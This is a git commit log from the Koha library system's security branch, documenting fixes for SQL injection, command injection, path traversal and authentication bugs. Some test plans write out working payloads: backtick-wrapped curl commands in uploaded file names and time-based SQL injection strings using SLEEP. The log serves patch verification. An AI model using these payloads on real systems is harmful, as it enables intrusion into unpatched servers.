]> git.koha-community.org Git - koha.git/log
koha.git
2 months agoBug 37508: Test for errors when returning an aliased password column
David Cook [Wed, 7 Aug 2024 01:15:10 +0000 (01:15 +0000)]
Bug 37508: Test for errors when returning an aliased password column

Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37508: Throw error if password column is detected in SQL report
Aleisha Amohia [Mon, 29 Jul 2024 03:53:06 +0000 (03:53 +0000)]
Bug 37508: Throw error if password column is detected in SQL report

This enhancement prevents SQL queries from being run if they would return a password field from the database table.

To test:

1. Run tests and notice they fail t/db_dependent/Reports/Guided.t

2. Apply patch and restart services

3. Create a public report with an SQL report which would access a password column in a database table
4. Try to run the report. Notice you are met with an error and the results are not shown.
5. Access the JSON URL, you should not get the results and should be shown an error
6. Confirm tests pass t/db_dependent/Reports/Guided.t

Sponsored-by: Reserve Bank of New Zealand
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37370: Return 400 if OpacExportOptions does not contain the passed format
Tomas Cohen Arazi [Tue, 16 Jul 2024 15:43:39 +0000 (12:43 -0300)]
Bug 37370: Return 400 if OpacExportOptions does not contain the passed format

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37466: Add correct filter for sort_by in results.tt
David Cook [Thu, 25 Jul 2024 06:44:37 +0000 (06:44 +0000)]
Bug 37466: Add correct filter for sort_by in results.tt

This patch replaces the $raw filter with the correct uri filter
for the sort_by in results.tt

Test plan:
1. Apply patch
2. Go to /cgi-bin/koha/catalogue/search.pl?count=20&sort_by=popularity_dsc&idx=kw&q=1
3. Click on "Edit this search"
4. Note that the "Popularity (most to least)" Sort by option is selected
5. Go to /cgi-bin/koha/catalogue/search.pl?count=20&sort_by=popularity_dsc&idx=kw&q=24y24ty2498294t9824yt9y23
6. Click on "Edit this search"
7. Note that the "Popularity (most to least)" Sort by option is selected

Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Aleisha Amohia <aleishaamohia@hotmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37464: Validate "type" sent to barcode/svc
David Cook [Thu, 25 Jul 2024 06:56:18 +0000 (06:56 +0000)]
Bug 37464: Validate "type" sent to barcode/svc

This change validates the "type" sent to the barcode/svc. Without this
change, we pass the user input directly to GD::Barcode, which passes
the input into an eval{} block without any validation of its own.

Test plan:
0. Apply the patch
1. koha-plack --reload kohadev
2. Go to http://localhost:8081/cgi-bin/koha/svc/barcode?type=bad&barcode=123456
3. Note that a Code39 barcode is provided for an invalid type
4. Go to http://localhost:8081/cgi-bin/koha/svc/barcode?type=Code39&barcode=123456
5. Note that a Code39 barcode is provided
6. Go to http://localhost:8081/cgi-bin/koha/svc/barcode?type=UPCE&barcode=123456
7. Note that a non-Code39 barcode is provided (presumably UPCE)

Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Aleisha Amohia <aleishaamohia@hotmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37488: Validate paths in datalink.txt/idlink.txt files
David Cook [Fri, 26 Jul 2024 04:01:43 +0000 (04:01 +0000)]
Bug 37488: Validate paths in datalink.txt/idlink.txt files

This change validates the paths in datalink.txt/idlink.txt,
so that only images in the unpacked archive directory are allowed

Test plan:
0. Apply the patch
1. koha-plack --reload kohadev
2. Create a datalink.txt file with the following:
42,selfie.jpg
3. Create a jpeg at selfie.jpg
4. ZIP the datalink.txt and selfie.jpg files
5. Upload to the "Upload patron images" tool
(after enabling the "patronimages" system preference)
6. Note that the image uploads correctly

Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37323: Tidy
David Cook [Fri, 26 Jul 2024 03:27:22 +0000 (03:27 +0000)]
Bug 37323: Tidy

Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37323: Don't allow symlinks in link files in zip and validate filepaths
Chris Cormack [Thu, 18 Jul 2024 23:57:32 +0000 (23:57 +0000)]
Bug 37323: Don't allow symlinks in link files in zip and validate filepaths

Test plan:
0. Apply patch and restart/reload Koha
1. Test that uploading a patron image still works, in single file format and as a zip

Work as suggested

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37323: Escape characters in patron image picture upload
Amit Gupta [Thu, 11 Jul 2024 17:43:06 +0000 (23:13 +0530)]
Bug 37323: Escape characters in patron image picture upload

To Test
1. Create a file name for example: test.zip`curl xxxxtesting.informaticsglobal.com`.zip
   where the domain is one you can watch the logs from.
2. Go to Tools and click on Upload patron images choose option zip file and upload the file.
3. Check /var/log/apache2/access.log and see the curl with the IP
   "xx.xxx.xx.xxx - - [11/Jul/2024:23:10:33 +0530] "GET / HTTP/1.1" 200 267 "-" "curl/7.68.0"
4. Apply the patch
5. Repeat 2 and 3 step and check no error is coming for the Remote execution error.
6. Test uploading actual zip file and images still works.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37255: Fix handling of "All" values on waiting hold cancellation policy
Emmi Takkinen [Thu, 4 Jul 2024 11:23:31 +0000 (14:23 +0300)]
Bug 37255: Fix handling of "All" values on waiting hold cancellation policy

If one creates a default waiting hold cancellation policy with
patron categories set as "All" and itemtype set as "All", Koha
breaks on 500 error. This happens because in we try to match
template policy with "All" values either in category or itemtype
with *, not undef. This patch fixes this.

To test:
1. Create a new default waiting hold cancellation policy and
set both patron category and itemtype as "All".
2. Save policy.
=> Error page for error 500 is displayed.
3. Apply this patch.
4. Reload page.
=> Page is displayed and policy listing displays new policy
as it should.

Sponsored-by: Koha-Suomi Oy
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
2 months agoBug 37533: fix query in orderreceive.tt
Andreas Jonsson [Wed, 31 Jul 2024 09:06:02 +0000 (09:06 +0000)]
Bug 37533: fix query in orderreceive.tt

The new validation in the REST API will no longer allow
the operator "in".  Consequently, it has to be replaced
with the allowed "-in".

Test plan:

 * Open an invoice and click "Go to receipt page" and
   on any basket click "receive" and make sure the dialog
   box appears.

Signed-off-by: Aleisha Amohia <aleishaamohia@hotmail.com>
Signed-off-by: David Cook <dcook@prosentient.com.au>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoUpdate release notes for 23.05.13 release v23.05.13
Wainui Witika-Park [Sun, 28 Jul 2024 23:50:06 +0000 (11:50 +1200)]
Update release notes for 23.05.13 release

Signed-off-by: Wainui Witika-Park <wainuiwitikapark@catalyst.net.nz>
3 months agoIncrement version for 23.05.13 release
wainuiwitikapark [Thu, 25 Jul 2024 05:10:44 +0000 (05:10 +0000)]
Increment version for 23.05.13 release

Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoMerge branch '23.05.x' into 23.05.x-security
wainuiwitikapark [Thu, 25 Jul 2024 04:53:25 +0000 (04:53 +0000)]
Merge branch '23.05.x' into 23.05.x-security

3 months agoBug 37247: [23.05.x] Send Koha::Subscription to template
Fridolin Somers [Wed, 24 Jul 2024 08:21:26 +0000 (10:21 +0200)]
Bug 37247: [23.05.x] Send Koha::Subscription to template

Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37247: [23.05.x] Fix display of "closed"
Jonathan Druart [Fri, 5 Jul 2024 12:47:42 +0000 (14:47 +0200)]
Bug 37247: [23.05.x] Fix display of "closed"

The subscription was not shown as closed after we closed it.
This is because "closed" is not passed to the template.
It seems more reliable to rely on the subscription object (that is passed to both
serials/serials-collection.tt and serials/subscription-detail.tt, the
others are not showing the Reopen/Close buttons)

Also fetch the subscription object after and reopen/close it to display
accurate values.

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37247: [23.05.x] Fix subscriptions operation allowed without authentication
Fridolin Somers [Thu, 4 Jul 2024 14:18:17 +0000 (16:18 +0200)]
Bug 37247: [23.05.x] Fix subscriptions operation allowed without authentication

Move close and reopen after get_template_and_user().
Also move Koha::Subscriptions->find(), not a good idea to run DB queries
before authentication.

Test plan :
1) Apply patch
2) Authenticate to staff interface
3) Go to an existing open subscription
4) Open a new browser tab and use it to log-out
5) Go to first tab and click on 'Close'
6) You get login page
7) Authenticate
8) Check subscription is not closed
9) Check you can close and reopen subscription

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37210: Properly escape SQL query parameters by using bind values
Julian Maurice [Tue, 2 Jul 2024 14:32:32 +0000 (16:32 +0200)]
Bug 37210: Properly escape SQL query parameters by using bind values

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37210: Escape single quote in search string in overdue.pl
Hammat Wele [Thu, 27 Jun 2024 14:09:04 +0000 (14:09 +0000)]
Bug 37210: Escape single quote in search string in overdue.pl

To Test:
1. Go to /cgi-bin/koha/circ/overdue.pl
2. In the «Name or card number» field, type «Tommy'and(select(0)from(select(sleep(10)))v)and'»
3. Apply the filter
   ==> It takes 10 seconds, sleep(10) is executed
4. Inspect the page, in «Patron category:» field, put «Tommy'and(select(0)from(select(sleep(10)))v)and'» in one of his option's value
5. select the option from the filter and Apply the filter
   ==> It takes 10 seconds, sleep(10) is executed
we can inject SQL to the followin field : borname, itemtype, borcat, holdingbranch, homebranch and branch
6. Apply the patch
7. Repeat step 1,2,3
   ==> it doesn't take 10 seconds, the injected sql is not executed
8. Repeat step 5
==> it doesn't take 10 seconds, the injected sql is not executed
9. Repeat step 5 with the followin field : itemtype, holdingbranch, homebranch and branch
   ==> it doesn't take 10 seconds, the injected sql is not executed

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Add 400 response definition to all routes
Tomas Cohen Arazi [Mon, 8 Jul 2024 20:21:25 +0000 (17:21 -0300)]
Bug 37018: Add 400 response definition to all routes

This patch adds a test for well defined 400 responses on all verbs and
paths on the API spec.

The tests verify:

* Presence of 400 response definition
* The description must start with 'Bad request' (needs coding guideline)
* If DBIC queries are allowed on the route, then `invalid_query` needs
  to be mentioned in the description.

All routes get fixed to make the tests pass.

To test:
1. Apply this patch
2. Run:
   $ ktd --shell
  k$ yarn api:bundle
  k$ prove xt/api.t
=> SUCCESS: Tests pass!

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Clarify operators
Martin Renvoize [Wed, 10 Jul 2024 08:39:33 +0000 (09:39 +0100)]
Bug 37018: Clarify operators

This patch clarifies the list of operators both in the validate routine
and in the swagger descrption block where we document this feature for
the end user.

JD amended patch: tidy

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Silence useless warning
Tomas Cohen Arazi [Mon, 8 Jul 2024 20:30:01 +0000 (17:30 -0300)]
Bug 37018: Silence useless warning

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Handle exception in unhandled_exception() helper
Tomas Cohen Arazi [Mon, 8 Jul 2024 19:48:01 +0000 (16:48 -0300)]
Bug 37018: Handle exception in unhandled_exception() helper

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: (follow-up) adding some allowed operators
Hammat Wele [Wed, 3 Jul 2024 13:59:48 +0000 (13:59 +0000)]
Bug 37018: (follow-up) adding some allowed operators

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Use validation in search_rs helper
Martin Renvoize [Wed, 5 Jun 2024 13:20:22 +0000 (14:20 +0100)]
Bug 37018: Use validation in search_rs helper

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Add validation method to Koha::REST::Plugin::Query.pm
Martin Renvoize [Wed, 5 Jun 2024 13:19:54 +0000 (14:19 +0100)]
Bug 37018: Add validation method to Koha::REST::Plugin::Query.pm

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Add Koha::Exceptions::REST
Tomas Cohen Arazi [Mon, 8 Jul 2024 17:34:25 +0000 (14:34 -0300)]
Bug 37018: Add Koha::Exceptions::REST

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Unit tests
Martin Renvoize [Wed, 5 Jun 2024 13:19:06 +0000 (14:19 +0100)]
Bug 37018: Unit tests

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37018: Regression tests
Tomas Cohen Arazi [Sat, 6 Jul 2024 13:32:07 +0000 (10:32 -0300)]
Bug 37018: Regression tests

This patch adds regression tests. With the current codebase, the
malicious query returns a 200. It should be caught and a 400 needs to be
returned.

To test:
1. Apply this patch
2. Run:
   $ ktd --shell
  k$ prove t/db_dependent/api/v1/query.t
=> FAIL: It returns a 200
3. Once the rest of the patches are ready, repeat 2
=> SUCCESS: It returns a 400

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37146: Add tests
Jonathan Druart [Thu, 11 Jul 2024 09:40:35 +0000 (11:40 +0200)]
Bug 37146: Add tests

Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 37146: Prevent path traversal by validating input
David Cook [Fri, 21 Jun 2024 01:45:51 +0000 (01:45 +0000)]
Bug 37146: Prevent path traversal by validating input

This patch validates the plugin_name passed to plugin_launcher.pl
against the base path containing the "value_builder" directory.

Test plan:
0. Apply the patch
1. koha-plack --reload kohadev
2. Go to http://localhost:8081/cgi-bin/koha/cataloguing/addbiblio.pl?biblionumber=29
3. Check that the tag editor for leader still works
4. Go to http://localhost:8081/cgi-bin/koha/cataloguing/additem.pl?biblionumber=29
5. Check that the pluginf or "Date acquired" still works

Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 35115: (QA follow-up):
Pedro Amorim [Fri, 10 Nov 2023 15:07:35 +0000 (15:07 +0000)]
Bug 35115: (QA follow-up):

Spelling.
Tidyness.
Removal of leftover warn

Nick's patch fixes the issue as described, and I agree that it is the ideal solution here.
prove t/db_dependent/api/v1/erm_eholdings* passes
prove t/db_dependent/Koha/BackgroundJob/CreateEHoldingsFromBiblios.t passes

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 35115: Move store routine from Resource to Title and update code
Nick Clemens [Wed, 8 Nov 2023 18:36:29 +0000 (18:36 +0000)]
Bug 35115: Move store routine from Resource to Title and update code

These patches move the store routine from Koha::ERM::EHoldings::Resource to Koha::ERM::EHoldings::Title as the code deals exclusively with title fields.

It updates the code to ensure that records are created when a title is not attched to a biblio, and that only the biblio title field is updated when updating an eholdings title.

To test:
 1 - Enable ERMModule sys pref
 2 - Create a new public list, visit:
     /cgi-bin/koha/virtualshelves/shelves.pl
 3 - Click "New list" enter name, set public -> public
 4 - Click "Add items", enter 112\n113\n114 (new line for each), in "Biblio numbers"
 5 - Notice that all added biblios have quite a few MARC fields
 6 - Go to packages, visit:
     /cgi-bin/koha/erm/eholdings/local/packages
 7 - Create a new package, add a name and hit 'Submit'
 8 - Go to titles, visit:
     /cgi-bin/koha/erm/eholdings/local/titles
 9 - Click "import from list"
10 - Pick the package created in 7)
11 - On the row of the list created in 2), click "Import"
12 - Go back to the list, visit:
     /cgi-bin/koha/virtualshelves/shelves.pl?op=view&shelfnumber=1
13 - Notice all the biblios have been stripped of their MARC data, and only title remains.
14 - Go to details page for one of the bibs
15 - Edit -> Replace record via Z39.50
16 - You can search for anything, just make sure to import a mostly full record
17 - Go back to ERM - eHoldings - Local - Titles
18 - Edit the title for the record that was replaced
19 - Save
20 - Go to record details - note the record is gone again
21 - Apply patches
22 - Search the catalog
23 - Check some titles
24 - Add to a new list
25 - repeat 8 - 11 with the new list
26 - View and confirm records are intact
27 - Edit the eholdings title for one of the records, changing the title field
28 - Save and view record details
29 - Confirm record is intact and title updated

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 36816: Remove warning
Jonathan Druart [Wed, 22 May 2024 08:08:30 +0000 (10:08 +0200)]
Bug 36816: Remove warning

Use of uninitialized value in string eq at /kohadevbox/koha/opac/opac-memberentry.pl line 629.

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 98637f17a7e59b2fbf0d8d9331b2508065211913)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
3 months agoBug 36816: Restore clearing patron attributes - OPAC
Jonathan Druart [Wed, 22 May 2024 08:05:16 +0000 (10:05 +0200)]
Bug 36816: Restore clearing patron attributes - OPAC

1) Add a new patron attribute type, visit:
<staff_url>/cgi-bin/koha/admin/patron-attr-types.pl?op=add_attribute_type
2) Add a code and a description (whatever) - Make it 'Display in OPAC' and 'Editable in OPAC'
3) Access OPAC patron personal details page, visit:
<opac_url>/cgi-bin/koha/opac-memberentry.pl
4) Scroll down and add some info to 'whatever'. Click 'Submit update request'.
5) Visit the INTRA 'update patron requests from opac' page:
<staff_url>/cgi-bin/koha/members/members-update.pl
6) Notice the entry is there. Select 'approve' and click "Submit"
7) Repeat 3)
8) Scroll down and notice the approved value is there. Clear that data and "Submit update request" (as if you're requesting for that data to be removed/cleared)
9) Repeat 5)
10) Notice there's an entry, and it is not empty. Select 'approve' and click "Submit"
11) Repeat 3)
12) Scroll down and notice the request to update (clear) that field did go through, i.e. the data is not there anymore.

Also test self-registration and mandatory attributes

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit f4e999bb9f9a714eedc5bac22dd6902abe288af1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
Signed-off-by: wainuiwitikapark <wainuiwitikapark@catalyst.net.nz>
4 months agoUpdate release notes for 23.05.12 release v23.05.12
Lucas Gass [Tue, 11 Jun 2024 14:37:49 +0000 (14:37 +0000)]
Update release notes for 23.05.12 release

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoIncrement version for the 23.05.12 release
Lucas Gass [Fri, 7 Jun 2024 15:40:54 +0000 (15:40 +0000)]
Increment version for the 23.05.12 release

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36520: Sanitize input in opac-sendbasket.pl
Chris Cormack [Mon, 13 May 2024 02:26:13 +0000 (02:26 +0000)]
Bug 36520: Sanitize input in opac-sendbasket.pl

To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+-  to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36520: Prevent SQL injection in GetPreparedLetter
Jonathan Druart [Mon, 13 May 2024 12:47:28 +0000 (14:47 +0200)]
Bug 36520: Prevent SQL injection in GetPreparedLetter

Actually in _get_tt_params

The following query will delay the response

SELECT `me`.`biblionumber`, `me`.`frameworkcode`, `me`.`author`, `me`.`title`, `me`.`medium`, `me`.`subtitle`, `me`.`part_number`, `me`.`part_name`, `me`.`unititle`, `me`.`notes`, `me`.`serial`, `me`.`seriestitle`
, `me`.`copyrightdate`, `me`.`timestamp`, `me`.`datecreated`, `me`.`abstract`
  FROM `biblio` `me`
WHERE `biblionumber` = '1) AND (SELECT 1 FROM (SELECT(SLEEP(6)))x)-- -'
ORDER BY field( biblionumber, 1 ) AND (
    SELECT 1
      FROM
    SELECT SLEEP( 6 ) x
   ) -- - )

To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+-  to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent

Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36520: Add tests
Jonathan Druart [Wed, 15 May 2024 09:25:47 +0000 (11:25 +0200)]
Bug 36520: Add tests

Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36818: Escape characters in file names uploaded
Chris Cormack [Wed, 8 May 2024 22:41:43 +0000 (22:41 +0000)]
Bug 36818: Escape characters in file names uploaded

To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip'
   Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
5/ Repeat 2 & 3 and see the filename is now escaped
6/ Choose process and check no errors but no no remote execution occurs
7/ Test uploading actual zip file and images still works

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: (Rmaint follow-up) Fix number of tests
Lucas Gass [Mon, 3 Jun 2024 15:10:06 +0000 (15:10 +0000)]
Bug 36575: (Rmaint follow-up) Fix number of tests

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: (QA follow-up) Shibboleth POD and checkpw_internal call
Marcel de Rooy [Tue, 30 Apr 2024 14:39:36 +0000 (14:39 +0000)]
Bug 36575: (QA follow-up) Shibboleth POD and checkpw_internal call

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: Adjust checkpw_internal to return patron
Nick Clemens [Wed, 24 Apr 2024 15:06:22 +0000 (15:06 +0000)]
Bug 36575: Adjust checkpw_internal to return patron

This patch refactors checkpw_internal to remove the SQL code, use patron ojbects, and return the
patron that correctly matches the userid/caerdnumber when auth is successful

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: (bug 34893 follow-up) Return patron when autocreating in Shibboleth
Nick Clemens [Wed, 24 Apr 2024 14:25:40 +0000 (14:25 +0000)]
Bug 36575: (bug 34893 follow-up) Return patron when autocreating in Shibboleth

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: (bug 34893 follow-up) Return patron from LDAP
Nick Clemens [Wed, 24 Apr 2024 14:23:51 +0000 (14:23 +0000)]
Bug 36575: (bug 34893 follow-up) Return patron from LDAP

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: (QA follow-up)
Martin Renvoize [Thu, 11 Apr 2024 10:18:30 +0000 (12:18 +0200)]
Bug 36575: (QA follow-up)

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: Return correct patron when there is a shared userid / cardnumber
Nick Clemens [Thu, 11 Apr 2024 09:39:03 +0000 (09:39 +0000)]
Bug 36575: Return correct patron when there is a shared userid / cardnumber

This patch moves some patron fetching code in C4/Auth to use to patron returned from the validation
methods and only try to fetch the patron (to check if locked, update attempts, etc) if we didn't authenticate

To test:
1 - Set a user to have userid = BANANA password = Password1
2 - Set a user to have cardnumber = BANANA password = Password2
3 - Hit the patron authentication API:
    http://localhost:8080/api/v1/auth/password/validation
    with data:
    { "identifier": "BANANA", "password":"Password1" }
    and:
    { "identifier": "BANANA", "password":"Password2" }
4 - Note you receive the same response for both
5 - Apply patch, restart all
